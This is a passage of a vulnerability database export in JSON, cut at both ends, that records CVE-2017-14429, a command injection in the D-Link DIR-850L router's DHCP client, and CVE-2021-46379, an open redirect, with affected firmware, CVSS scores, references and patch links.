      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0600",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14429"
      }
    ]
  },
  "cve": "CVE-2017-14429",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-14429",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-31797",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-105150",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14429",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14429",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31797",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-566",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105150",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-14429",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105150"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14429"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The DHCP client on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices allows unauthenticated remote code execution as root because /etc/services/INET/inet_ipv4.php mishandles shell metacharacters, affecting generated files such as WAN-1-udhcpc.sh. The D-Link DIR-850L device firmware contains a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. A security vulnerability exists in the DHCP client on REV. A devices using firmware FW114WWb07_h2ab_beta1 and earlier and on REV. B devices using firmware FW208WWb02 and earlier. The vulnerability arises because the /etc/services/INET/inet_ipv4.php file does not handle shell metacharacters correctly. A remote attacker could exploit the vulnerability to execute code with root privileges.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14429"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105150"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14429"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14429",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105150",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14429",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105150"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14429"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ]
  },
  "id": "VAR-201709-0600",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105150"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:19:33.242000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "Repair measures for D-Link DIR-850L REV.A and REV.B DHCP client security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100046"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-77",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105150"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14429"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14429"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14429"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105150"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14429"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105150"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14429"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105150"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-14429"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "date": "2017-09-13T17:29:00.870000",
        "db": "NVD",
        "id": "CVE-2017-14429"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31797"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105150"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-14429"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      },
      {
        "date": "2023-11-17T19:58:49.280000",
        "db": "NVD",
        "id": "CVE-2017-14429"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Command injection vulnerability in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008110"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system command injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-566"
      }
    ],
    "trust": 0.6
  }
}

VAR-202203-0928

Vulnerability from variot - Updated: 2023-12-18 11:56

DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to an untrusted site. An open redirect vulnerability exists in the dir-850l firmware of D-Link Japan Co., Ltd. Information may be obtained and tampered with. D-Link DIR850 ET850-1.08TRb03 is a router from DLink. No detailed vulnerability information is currently provided. The CVSS vectors in the record below mark user interaction as required.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202203-0928",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08trb03"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u30c7\u30a3\u30fc\u30ea\u30f3\u30af\u30b8\u30e3\u30d1\u30f3\u682a\u5f0f\u4f1a\u793e",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u30c7\u30a3\u30fc\u30ea\u30f3\u30af\u30b8\u30e3\u30d1\u30f3\u682a\u5f0f\u4f1a\u793e",
        "version": "dir-850l  firmware  1.08trb03"
      },
      {
        "model": "dir-850l",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30c7\u30a3\u30fc\u30ea\u30f3\u30af\u30b8\u30e3\u30d1\u30f3\u682a\u5f0f\u4f1a\u793e",
        "version": null
      },
      {
        "model": "dir-850l 1.08trb03",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-46379"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-46379"
      }
    ]
  },
  "cve": "CVE-2021-46379",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.8,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2021-46379",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2022-20161",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2021-46379",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-46379",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2022-20161",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202203-469",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-46379",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-46379"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-46379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to an untrusted site. An open redirect vulnerability exists in the dir-850l firmware of D-Link Japan Co., Ltd. Information may be obtained and tampered with. D-Link DIR850 ET850-1.08TRb03 is a router from DLink. No detailed vulnerability information is currently provided",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-46379"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-46379"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
